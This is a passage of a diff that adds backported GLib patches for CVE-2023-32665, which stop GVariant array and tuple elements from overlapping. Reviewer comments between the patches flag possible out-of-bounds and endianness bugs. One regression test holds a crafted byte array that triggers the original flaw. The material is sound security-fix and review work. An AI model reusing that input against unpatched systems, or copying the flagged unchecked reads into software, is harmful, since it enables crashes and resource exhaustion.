+@@ -692,11 +718,9 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+ else
+ start = 0;
+
+- end = gvs_read_unaligned_le (value.data + last_end +
+- (offset_size * index_),
+- offset_size);
++ end = gvs_offsets_get_offset_n (&offsets, index_);
+
+- if (start < end && end <= value.size && end <= last_end)
++ if (start < end && end <= value.size && end <= offsets.data_size)
+ {
+ child.data = value.data + start;
+ child.size = end - start;
+@@ -768,34 +792,16 @@ static gboolean
+ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+ {
+ GVariantSerialised child = { 0, };
+- gsize offsets_array_size;
+- guchar *offsets_array;
+- guint offset_size;
+ guint alignment;
+- gsize last_end;
+- gsize length;
+ gsize offset;
+ gsize i;
+
+- if (value.size == 0)
+- return TRUE;
+-
+- offset_size = gvs_get_offset_size (value.size);
+- last_end = gvs_read_unaligned_le (value.data + value.size -
+- offset_size, offset_size);
++ struct Offsets offsets = gvs_variable_sized_array_get_frame_offsets (value);
+
+- if (last_end > value.size)
++ if (!offsets.is_normal)
+ return FALSE;
+
+- offsets_array_size = value.size - last_end;
+-
+- if (offsets_array_size % offset_size)
+- return FALSE;
+-
+- offsets_array = value.data + value.size - offsets_array_size;
+- length = offsets_array_size / offset_size;
+-
+- if (length == 0)
++ if (value.size != 0 && offsets.length == 0)
+ return FALSE;
+
+ child.type_info = g_variant_type_info_element (value.type_info);
+@@ -803,14 +809,14 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+ child.depth = value.depth + 1;
+ offset = 0;
+
+- for (i = 0; i < length; i++)
++ for (i = 0; i < offsets.length; i++)
+ {
+ gsize this_end;
+
+- this_end = gvs_read_unaligned_le (offsets_array + offset_size * i,
+- offset_size);
++ this_end = gvs_read_unaligned_le (offsets.array + offsets.offset_size * i,
++ offsets.offset_size);
+
+- if (this_end < offset || this_end > last_end)
++ if (this_end < offset || this_end > offsets.data_size)
+ return FALSE;
+
+ while (offset & alignment)
+@@ -832,7 +838,7 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+ offset = this_end;
+ }
+
+- g_assert (offset == last_end);
++ g_assert (offset == offsets.data_size);
+
+ return TRUE;
+ }
+--
+2.24.4
+
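Review bot: In the rewritten `gvs_variable_sized_array_get_child`, the struct returned by `gvs_variable_sized_array_get_frame_offsets (value)` is used without looking at `offsets.is_normal`; on the two "offsets not normal" return paths it still has `array == NULL` and `length == 0`, so `gvs_offsets_get_offset_n (&offsets, index_)` would read through a null-based pointer. That is safe only if every caller has already bounded `index_` by the n_children result (0 in that case), and no such caller is visible in this patch. I would state the precondition above the function, e.g. `/* Caller must ensure index_ < gvs_variable_sized_array_n_children (value). */`, or assert it. Separately, the loop in `gvs_variable_sized_array_is_normal` still open-codes the read and could use the new helper: `this_end = gvs_offsets_get_offset_n (&offsets, i);`.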
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0003.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0003.patch
new file mode 100644
index 0000000000..e361cc7aad
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0003.patch
@@ -0,0 +1,417 @@
+From ade71fb544391b2e33e1859645726bfee0d5eaaf Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 16 Aug 2023 03:12:21 +0000
+Subject: [PATCH] gvariant: Don't allow child elements to overlap with each
+ other
+
+If different elements of a variable sized array can overlap with each
+other then we can cause a `GVariant` to normalise to a much larger type.
+
+This commit changes the behaviour of `GVariant` with non-normal form data. If
+an invalid frame offset is found all subsequent elements are given their
+default value.
+
+When retrieving an element at index `n` we scan the frame offsets up to index
+`n` and if they are not in order we return an element with the default value
+for that type. This guarantees that elements don't overlap with each
+other. We remember the offset we've scanned up to so we don't need to
+repeat this work on subsequent accesses. We skip these checks for trusted
+data.
+
+Unfortunately this makes random access of untrusted data O(n) — at least
+on first access. It doesn't affect the algorithmic complexity of accessing
+elements in order, such as when using the `GVariantIter` interface. Also:
+the cost of validation will be amortised as the `GVariant` instance is
+continued to be used.
+
+I've implemented this with 4 different functions, 1 for each element size,
+rather than looping calling `gvs_read_unaligned_le` in the hope that the
+compiler will find it easy to optimise and should produce fairly tight
+code.
+
+Fixes: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/ade71fb544391b2e33e1859645726bfee0d5eaaf]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-core.c | 35 ++++++++++++++++
+ glib/gvariant-serialiser.c | 86 ++++++++++++++++++++++++++++++++++++--
+ glib/gvariant-serialiser.h | 8 ++++
+ glib/tests/gvariant.c | 45 ++++++++++++++++++++
+ 4 files changed, 171 insertions(+), 3 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index aa0e0a0..9b51e15 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -65,6 +65,7 @@ struct _GVariant
+ {
+ GBytes *bytes;
+ gconstpointer data;
++ gsize ordered_offsets_up_to;
+ } serialised;
+
+ struct
+@@ -162,6 +163,24 @@ struct _GVariant
+ * if .data pointed to the appropriate number of nul
+ * bytes.
+ *
++ * .ordered_offsets_up_to: If ordered_offsets_up_to == n this means that all
++ * the frame offsets up to and including the frame
++ * offset determining the end of element n are in
++ * order. This guarantees that the bytes of element
++ * n don't overlap with any previous element.
++ *
++ * For trusted data this is set to G_MAXSIZE and we
++ * don't check that the frame offsets are in order.
++ *
++ * Note: This doesn't imply the offsets are good in
++ * any way apart from their ordering. In particular
++ * offsets may be out of bounds for this value or
++ * may imply that the data overlaps the frame
++ * offsets themselves.
++ *
++ * This field is only relevant for arrays of non
++ * fixed width types.
++ *
+ * .tree: Only valid when the instance is in tree form.
+ *
+ * Note that accesses from other threads could result in
+@@ -365,6 +384,7 @@ g_variant_to_serialised (GVariant *value)
+ (gpointer) value->contents.serialised.data,
+ value->size,
+ value->depth,
++ value->contents.serialised.ordered_offsets_up_to,
+ };
+ return serialised;
+ }
+@@ -396,6 +416,7 @@ g_variant_serialise (GVariant *value,
+ serialised.size = value->size;
+ serialised.data = data;
+ serialised.depth = value->depth;
++ serialised.ordered_offsets_up_to = 0;
+
+ children = (gpointer *) value->contents.tree.children;
+ n_children = value->contents.tree.n_children;
+@@ -439,6 +460,15 @@ g_variant_fill_gvs (GVariantSerialised *serialised,
+ g_assert (serialised->size == value->size);
+ serialised->depth = value->depth;
+
++ if (value->state & STATE_SERIALISED)
++ {
++ serialised->ordered_offsets_up_to = value->contents.serialised.ordered_offsets_up_to;
++ }
++ else
++ {
++ serialised->ordered_offsets_up_to = 0;
++ }
++
+ if (serialised->data)
+ /* g_variant_store() is a public API, so it
+ * it will reacquire the lock if it needs to.
+@@ -481,6 +511,7 @@ g_variant_ensure_serialised (GVariant *value)
+ bytes = g_bytes_new_take (data, value->size);
+ value->contents.serialised.data = g_bytes_get_data (bytes, NULL);
+ value->contents.serialised.bytes = bytes;
++ value->contents.serialised.ordered_offsets_up_to = G_MAXSIZE;
+ value->state |= STATE_SERIALISED;
+ }
+ }
+@@ -561,6 +592,7 @@ g_variant_new_from_bytes (const GVariantType *type,
+ serialised.type_info = value->type_info;
+ serialised.data = (guchar *) g_bytes_get_data (bytes, &serialised.size);
+ serialised.depth = 0;
++ serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
+
+ if (!g_variant_serialised_check (serialised))
+ {
+@@ -610,6 +642,8 @@ g_variant_new_from_bytes (const GVariantType *type,
+ value->contents.serialised.data = g_bytes_get_data (bytes, &value->size);
+ }
+
++ value->contents.serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
++
+ g_clear_pointer (&owned_bytes, g_bytes_unref);
+
+ return value;
+@@ -1108,6 +1142,7 @@ g_variant_get_child_value (GVariant *value,
+ child->contents.serialised.bytes =
+ g_bytes_ref (value->contents.serialised.bytes);
+ child->contents.serialised.data = s_child.data;
++ child->contents.serialised.ordered_offsets_up_to = s_child.ordered_offsets_up_to;
+
+ return child;
+ }
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index c7c2114..fe0b1a4 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -1,6 +1,7 @@
+ /*
+ * Copyright © 2007, 2008 Ryan Lortie
+ * Copyright © 2010 Codethink Limited
++ * Copyright © 2020 William Manley
+ *
+ * This library is free software; you can redistribute it and/or
+ * modify it under the terms of the GNU Lesser General Public
+@@ -264,6 +265,7 @@ gvs_fixed_sized_maybe_get_child (GVariantSerialised value,
+ value.type_info = g_variant_type_info_element (value.type_info);
+ g_variant_type_info_ref (value.type_info);
+ value.depth++;
++ value.ordered_offsets_up_to = 0;
+
+ return value;
+ }
+@@ -295,7 +297,7 @@ gvs_fixed_sized_maybe_serialise (GVariantSerialised value,
+ {
+ if (n_children)
+ {
+- GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1 };
++ GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1, 0 };
+
+ gvs_filler (&child, children[0]);
+ }
+@@ -317,6 +319,7 @@ gvs_fixed_sized_maybe_is_normal (GVariantSerialised value)
+ /* proper element size: "Just". recurse to the child. */
+ value.type_info = g_variant_type_info_element (value.type_info);
+ value.depth++;
++ value.ordered_offsets_up_to = 0;
+
+ return g_variant_serialised_is_normal (value);
+ }
+@@ -358,6 +361,7 @@ gvs_variable_sized_maybe_get_child (GVariantSerialised value,
+ value.data = NULL;
+
+ value.depth++;
++ value.ordered_offsets_up_to = 0;
+
+ return value;
+ }
+@@ -388,7 +392,7 @@ gvs_variable_sized_maybe_serialise (GVariantSerialised value,
+ {
+ if (n_children)
+ {
+- GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1 };
++ GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1, 0 };
+
+ /* write the data for the child. */
+ gvs_filler (&child, children[0]);
+@@ -408,6 +412,7 @@ gvs_variable_sized_maybe_is_normal (GVariantSerialised value)
+ value.type_info = g_variant_type_info_element (value.type_info);
+ value.size--;
+ value.depth++;
++ value.ordered_offsets_up_to = 0;
+
+ return g_variant_serialised_is_normal (value);
+ }
+@@ -691,6 +696,32 @@ gvs_variable_sized_array_n_children (GVariantSerialised value)
+ return gvs_variable_sized_array_get_frame_offsets (value).length;
+ }
+
++/* Find the index of the first out-of-order element in @data, assuming that
++ * @data is an array of elements of given @type, starting at index @start and
++ * containing a further @len-@start elements. */
++#define DEFINE_FIND_UNORDERED(type) \
++ static gsize \
++ find_unordered_##type (const guint8 *data, gsize start, gsize len) \
++ { \
++ gsize off; \
++ type current, previous; \
++ \
++ memcpy (&previous, data + start * sizeof (current), sizeof (current)); \
++ for (off = (start + 1) * sizeof (current); off < len * sizeof (current); off += sizeof (current)) \
++ { \
++ memcpy (&current, data + off, sizeof (current)); \
++ if (current < previous) \
++ break; \
++ previous = current; \
++ } \
++ return off / sizeof (current) - 1; \
++ }
++
++DEFINE_FIND_UNORDERED (guint8);
++DEFINE_FIND_UNORDERED (guint16);
++DEFINE_FIND_UNORDERED (guint32);
++DEFINE_FIND_UNORDERED (guint64);
++
+ static GVariantSerialised
+ gvs_variable_sized_array_get_child (GVariantSerialised value,
+ gsize index_)
+@@ -706,6 +737,49 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+ g_variant_type_info_ref (child.type_info);
+ child.depth = value.depth + 1;
+
++ /* If the requested @index_ is beyond the set of indices whose framing offsets
++ * have been checked, check the remaining offsets to see whether they’re
++ * normal (in order, no overlapping array elements). */
++ if (index_ > value.ordered_offsets_up_to)
++ {
++ switch (offsets.offset_size)
++ {
++ case 1:
++ {
++ value.ordered_offsets_up_to = find_unordered_guint8 (
++ offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ break;
++ }
++ case 2:
++ {
++ value.ordered_offsets_up_to = find_unordered_guint16 (
++ offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ break;
++ }
++ case 4:
++ {
++ value.ordered_offsets_up_to = find_unordered_guint32 (
++ offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ break;
++ }
++ case 8:
++ {
++ value.ordered_offsets_up_to = find_unordered_guint64 (
++ offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ break;
++ }
++ default:
++ /* gvs_get_offset_size() only returns maximum 8 */
++ g_assert_not_reached ();
++ }
++ }
++
++ if (index_ > value.ordered_offsets_up_to)
++ {
++ /* Offsets are invalid somewhere, so return an empty child. */
++ return child;
++ }
++
+ if (index_ > 0)
+ {
+ guint alignment;
+@@ -840,6 +914,9 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+
+ g_assert (offset == offsets.data_size);
+
++ /* All offsets have now been checked. */
++ value.ordered_offsets_up_to = G_MAXSIZE;
++
+ return TRUE;
+ }
+
+@@ -1072,7 +1149,7 @@ gvs_tuple_is_normal (GVariantSerialised value)
+ for (i = 0; i < length; i++)
+ {
+ const GVariantMemberInfo *member_info;
+- GVariantSerialised child;
++ GVariantSerialised child = { 0, };
+ gsize fixed_size;
+ guint alignment;
+ gsize end;
+@@ -1132,6 +1209,9 @@ gvs_tuple_is_normal (GVariantSerialised value)
+ offset = end;
+ }
+
++ /* All element bounds have been checked above. */
++ value.ordered_offsets_up_to = G_MAXSIZE;
++
+ {
+ gsize fixed_size;
+ guint alignment;
+diff --git a/glib/gvariant-serialiser.h b/glib/gvariant-serialiser.h
+index 81343e9..99d18ef 100644
+--- a/glib/gvariant-serialiser.h
++++ b/glib/gvariant-serialiser.h
+@@ -29,6 +29,14 @@ typedef struct
+ guchar *data;
+ gsize size;
+ gsize depth; /* same semantics as GVariant.depth */
++ /* If ordered_offsets_up_to == n this means that all the frame offsets up to and
++ * including the frame offset determining the end of element n are in order.
++ * This guarantees that the bytes of element n don't overlap with any previous
++ * element.
++ *
++ * This is both read and set by g_variant_serialised_get_child for arrays of
++ * non-fixed-width types */
++ gsize ordered_offsets_up_to;
+ } GVariantSerialised;
+
+ /* deserialisation */
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 0e5ec8e..967e9a1 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -1,5 +1,6 @@
+ /*
+ * Copyright © 2010 Codethink Limited
++ * Copyright © 2020 William Manley
+ *
+ * This library is free software; you can redistribute it and/or
+ * modify it under the terms of the GNU Lesser General Public
+@@ -1283,6 +1284,7 @@ random_instance_filler (GVariantSerialised *serialised,
+ serialised->size = instance->size;
+
+ serialised->depth = 0;
++ serialised->ordered_offsets_up_to = 0;
+
+ g_assert_true (serialised->type_info == instance->type_info);
+ g_assert_cmpuint (serialised->size, ==, instance->size);
+@@ -5039,6 +5041,47 @@ test_normal_checking_array_offsets (void)
+ g_variant_unref (variant);
+ }
+
++/* This is a regression test that we can't have non-normal values that take up
++ * significantly more space than the normal equivalent, by specifying the
++ * offset table entries so that array elements overlap.
++ *
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_832242 */
++static void
++test_normal_checking_array_offsets2 (void)
++{
++ const guint8 data[] = {
++ 'h', 'i', '\0',
++ 0x03, 0x00, 0x03,
++ 0x06, 0x00, 0x06,
++ 0x09, 0x00, 0x09,
++ 0x0c, 0x00, 0x0c,
++ 0x0f, 0x00, 0x0f,
++ 0x12, 0x00, 0x12,
++ 0x15, 0x00, 0x15,
++ };
++ gsize size = sizeof (data);
++ const GVariantType *aaaaaaas = G_VARIANT_TYPE ("aaaaaaas");
++ GVariant *variant = NULL;
++ GVariant *normal_variant = NULL;
++ GVariant *expected = NULL;
++
++ variant = g_variant_new_from_data (aaaaaaas, data, size, FALSE, NULL, NULL);
++ g_assert_nonnull (variant);
++
++ normal_variant = g_variant_get_normal_form (variant);
++ g_assert_nonnull (normal_variant);
++ g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 2);
++
++ expected = g_variant_new_parsed (
++ "[[[[[[['hi', '', ''], [], []], [], []], [], []], [], []], [], []], [], []]");
++ g_assert_cmpvariant (expected, variant);
++ g_assert_cmpvariant (expected, normal_variant);
++
++ g_variant_unref (expected);
++ g_variant_unref (normal_variant);
++ g_variant_unref (variant);
++}
++
+ /* Test that a tuple with invalidly large values in its offset table is
+ * normalised successfully without looping infinitely. */
+ static void
+@@ -5206,6 +5249,8 @@ main (int argc, char **argv)
+ test_normal_checking_tuples);
+ g_test_add_func ("/gvariant/normal-checking/array-offsets",
+ test_normal_checking_array_offsets);
++ g_test_add_func ("/gvariant/normal-checking/array-offsets2",
++ test_normal_checking_array_offsets2);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets",
+ test_normal_checking_tuple_offsets);
+ g_test_add_func ("/gvariant/normal-checking/empty-object-path",
+--
+2.24.4
+
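Review bot: `find_unordered_guint16`, `_guint32` and `_guint64` compare offsets in host byte order, because `DEFINE_FIND_UNORDERED` copies each table entry with `memcpy` straight into `previous` / `current`, while the rest of this file reads the same table through `gvs_read_unaligned_le`, which by its name reads little-endian. On a big-endian target the `current < previous` test would then run on byte-swapped values whenever the offset size is larger than one byte, so the overlap check added in `gvs_variable_sized_array_get_child` could both reject well-formed data and miss out-of-order offsets. Converting both values after the copy fixes it; the sketch below passes the conversion macro as a second macro parameter. Whether a later patch in this series already does so is not visible from here.

```c
#define DEFINE_FIND_UNORDERED(type, le_to_native) \
  /* … unchanged: function signature and locals … */ \
    memcpy (&previous, data + start * sizeof (current), sizeof (current)); \
    previous = le_to_native (previous); \
  /* … unchanged: for-loop header … */ \
        memcpy (&current, data + off, sizeof (current)); \
        current = le_to_native (current); \
  /* … unchanged: ordering test and return … */

DEFINE_FIND_UNORDERED (guint8, );
DEFINE_FIND_UNORDERED (guint16, GUINT16_FROM_LE);
DEFINE_FIND_UNORDERED (guint32, GUINT32_FROM_LE);
DEFINE_FIND_UNORDERED (guint64, GUINT64_FROM_LE);
```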
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0004.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0004.patch
new file mode 100644
index 0000000000..c057729aae
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0004.patch
@@ -0,0 +1,113 @@
+From 345cae9c1aa7bf6752039225ef4c8d8d69fa8d76 Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Fri, 11 Aug 2023 04:09:12 +0000
+Subject: [PATCH] gvariant-serialiser: Factor out code to get bounds of a tuple
+ member
+
+This introduces no functional changes.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/345cae9c1aa7bf6752039225ef4c8d8d69fa8d76]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-serialiser.c | 73 ++++++++++++++++++++++++--------------
+ 1 file changed, 46 insertions(+), 27 deletions(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index fe0b1a4..6f9b366 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -942,6 +942,51 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+ * for the tuple. See the notes in gvarianttypeinfo.h.
+ */
+
++static void
++gvs_tuple_get_member_bounds (GVariantSerialised value,
++ gsize index_,
++ gsize offset_size,
++ gsize *out_member_start,
++ gsize *out_member_end)
++{
++ const GVariantMemberInfo *member_info;
++ gsize member_start, member_end;
++
++ member_info = g_variant_type_info_member_info (value.type_info, index_);
++
++ if (member_info->i + 1)
++ member_start = gvs_read_unaligned_le (value.data + value.size -
++ offset_size * (member_info->i + 1),
++ offset_size);
++ else
++ member_start = 0;
++
++ member_start += member_info->a;
++ member_start &= member_info->b;
++ member_start |= member_info->c;
++
++ if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST)
++ member_end = value.size - offset_size * (member_info->i + 1);
++
++ else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
++ {
++ gsize fixed_size;
++
++ g_variant_type_info_query (member_info->type_info, NULL, &fixed_size);
++ member_end = member_start + fixed_size;
++ }
++
++ else /* G_VARIANT_MEMBER_ENDING_OFFSET */
++ member_end = gvs_read_unaligned_le (value.data + value.size -
++ offset_size * (member_info->i + 2),
++ offset_size);
++
++ if (out_member_start != NULL)
++ *out_member_start = member_start;
++ if (out_member_end != NULL)
++ *out_member_end = member_end;
++}
++
+ static gsize
+ gvs_tuple_n_children (GVariantSerialised value)
+ {
+@@ -997,33 +1042,7 @@ gvs_tuple_get_child (GVariantSerialised value,
+ }
+ }
+
+- if (member_info->i + 1)
+- start = gvs_read_unaligned_le (value.data + value.size -
+- offset_size * (member_info->i + 1),
+- offset_size);
+- else
+- start = 0;
+-
+- start += member_info->a;
+- start &= member_info->b;
+- start |= member_info->c;
+-
+- if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST)
+- end = value.size - offset_size * (member_info->i + 1);
+-
+- else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
+- {
+- gsize fixed_size;
+-
+- g_variant_type_info_query (child.type_info, NULL, &fixed_size);
+- end = start + fixed_size;
+- child.size = fixed_size;
+- }
+-
+- else /* G_VARIANT_MEMBER_ENDING_OFFSET */
+- end = gvs_read_unaligned_le (value.data + value.size -
+- offset_size * (member_info->i + 2),
+- offset_size);
++ gvs_tuple_get_member_bounds (value, index_, offset_size, &start, &end);
+
+ /* The child should not extend into the offset table. */
+ if (index_ != g_variant_type_info_n_members (value.type_info) - 1)
+--
+2.24.4
+
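Review bot: The removed `G_VARIANT_MEMBER_ENDING_FIXED` branch in `gvs_tuple_get_child` also did `child.size = fixed_size;`, and the new `gvs_tuple_get_member_bounds` helper has no equivalent, so this patch is not quite the "no functional changes" its message claims. With only this patch applied, a fixed-size member that fails the later bounds test appears to be returned without its size set; the rest of `gvs_tuple_get_child` lies outside the hunk, so this is inferred. The next patch in the series sets `child.size` up front for fixed-size members, so the two need to be applied together. If this one had to stand alone, it would need `if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED) g_variant_type_info_query (child.type_info, NULL, &child.size);` next to the helper call.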
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0005.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0005.patch
new file mode 100644
index 0000000000..7e516b07ab
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0005.patch
@@ -0,0 +1,80 @@
+From 73d0aa81c2575a5c9ae77dcb94da919579014fc0 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Fri, 11 Aug 2023 04:13:02 +0000
+Subject: [PATCH] gvariant-serialiser: Rework child size calculation
+
+This reduces a few duplicate calls to `g_variant_type_info_query()` and
+explains why they’re needed.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/73d0aa81c2575a5c9ae77dcb94da919579014fc0]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-serialiser.c | 31 +++++++++----------------------
+ 1 file changed, 9 insertions(+), 22 deletions(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index 6f9b366..fb75923 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -1007,14 +1007,18 @@ gvs_tuple_get_child (GVariantSerialised value,
+ child.depth = value.depth + 1;
+ offset_size = gvs_get_offset_size (value.size);
+
++ /* Ensure the size is set for fixed-sized children, or
++ * g_variant_serialised_check() will fail, even if we return
++ * (child.data == NULL) to indicate an error. */
++ if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
++ g_variant_type_info_query (child.type_info, NULL, &child.size);
++
+ /* tuples are the only (potentially) fixed-sized containers, so the
+ * only ones that have to deal with the possibility of having %NULL
+ * data with a non-zero %size if errors occurred elsewhere.
+ */
+ if G_UNLIKELY (value.data == NULL && value.size != 0)
+ {
+- g_variant_type_info_query (child.type_info, NULL, &child.size);
+-
+ /* this can only happen in fixed-sized tuples,
+ * so the child must also be fixed sized.
+ */
+@@ -1032,29 +1036,12 @@ gvs_tuple_get_child (GVariantSerialised value,
+ else
+ {
+ if (offset_size * (member_info->i + 1) > value.size)
+- {
+- /* if the child is fixed size, return its size.
+- * if child is not fixed-sized, return size = 0.
+- */
+- g_variant_type_info_query (child.type_info, NULL, &child.size);
+-
+- return child;
+- }
++ return child;
+ }
+
+- gvs_tuple_get_member_bounds (value, index_, offset_size, &start, &end);
+-
+ /* The child should not extend into the offset table. */
+- if (index_ != g_variant_type_info_n_members (value.type_info) - 1)
+- {
+- GVariantSerialised last_child;
+- last_child = gvs_tuple_get_child (value,
+- g_variant_type_info_n_members (value.type_info) - 1);
+- last_end = last_child.data + last_child.size - value.data;
+- g_variant_type_info_unref (last_child.type_info);
+- }
+- else
+- last_end = end;
++ gvs_tuple_get_member_bounds (value, index_, offset_size, &start, &end);
++ gvs_tuple_get_member_bounds (value, g_variant_type_info_n_members (value.type_info) - 1, offset_size, NULL, &last_end);
+
+ if (start < end && end <= value.size && end <= last_end)
+ {
+--
+2.24.4
+
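Review bot: The second `gvs_tuple_get_member_bounds` call, made for the last member to obtain `last_end`, is not covered by the size check visible above it, since `if (offset_size * (member_info->i + 1) > value.size)` presumably tests the `member_info` of `index_`, not that of the last member. The helper from the previous patch computes `member_start` even when `out_member_start` is NULL, reading at `value.data + value.size - offset_size * (member_info->i + 1)`. For the last member `i` can presumably be larger than for `index_`, so on a short untrusted buffer that subtraction could wrap and the read land outside `value.data`. The code being replaced went through `gvs_tuple_get_child` for the last member and so ran that check for it. Unless something outside these hunks (the function starts and ends beyond them) rules this out, I would compare the last member's `i` against `value.size` before the call and `return child;` on failure.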
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0006.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0006.patch
new file mode 100644
index 0000000000..8558a7911f
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0006.patch
@@ -0,0 +1,396 @@
+From 7cf6f5b69146d20948d42f0c476688fe17fef787 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 16 Aug 2023 12:09:06 +0000
+Subject: [PATCH] gvariant: Don't allow child elements of a tuple to overlap
+ each other
+
+This is similar to the earlier commit which prevents child elements of a
+variable-sized array from overlapping each other, but this time for
+tuples. It is based heavily on ideas by William Manley.
+
+Tuples are slightly different from variable-sized arrays in that they
+contain a mixture of fixed and variable sized elements. All but one of
+the variable sized elements have an entry in the frame offsets table.
+This means that if we were to just check the ordering of the frame
+offsets table, the variable sized elements could still overlap
+interleaving fixed sized elements, which would be bad.
+
+Therefore we have to check the elements rather than the frame offsets.
+
+The logic of checking the elements up to the index currently being
+requested, and caching the result in `ordered_offsets_up_to`, means that
+the algorithmic cost implications are the same for this commit as for
+variable-sized arrays: an O(N) cost for these checks is amortised out
+over N accesses to O(1) per access.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/7cf6f5b69146d20948d42f0c476688fe17fef787]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-core.c | 6 +-
+ glib/gvariant-serialiser.c | 40 ++++++++
+ glib/gvariant-serialiser.h | 7 +-
+ glib/gvariant.c | 1 +
+ glib/tests/gvariant.c | 181 +++++++++++++++++++++++++++++++++++++
+ 5 files changed, 232 insertions(+), 3 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index 9b51e15..b951cd9 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -1,6 +1,7 @@
+ /*
+ * Copyright © 2007, 2008 Ryan Lortie
+ * Copyright © 2010 Codethink Limited
++ * Copyright © 2022 Endless OS Foundation, LLC
+ *
+ * This library is free software; you can redistribute it and/or
+ * modify it under the terms of the GNU Lesser General Public
+@@ -179,7 +180,7 @@ struct _GVariant
+ * offsets themselves.
+ *
+ * This field is only relevant for arrays of non
+- * fixed width types.
++ * fixed width types and for tuples.
+ *
+ * .tree: Only valid when the instance is in tree form.
+ *
+@@ -1117,6 +1118,9 @@ g_variant_get_child_value (GVariant *value,
+ */
+ s_child = g_variant_serialised_get_child (serialised, index_);
+
++ /* Update the cached ordered_offsets_up_to, since @serialised will be thrown away when this function exits */
++ value->contents.serialised.ordered_offsets_up_to = MAX (value->contents.serialised.ordered_offsets_up_to, serialised.ordered_offsets_up_to);
++
+ /* Check whether this would cause nesting too deep. If so, return a fake
+ * child. The only situation we expect this to happen in is with a variant,
+ * as all other deeply-nested types have a static type, and hence should
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index fb75923..cd4a3e6 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -942,6 +942,10 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+ * for the tuple. See the notes in gvarianttypeinfo.h.
+ */
+
++/* Note: This doesn’t guarantee that @out_member_end >= @out_member_start; that
++ * condition may not hold true for invalid serialised variants. The caller is
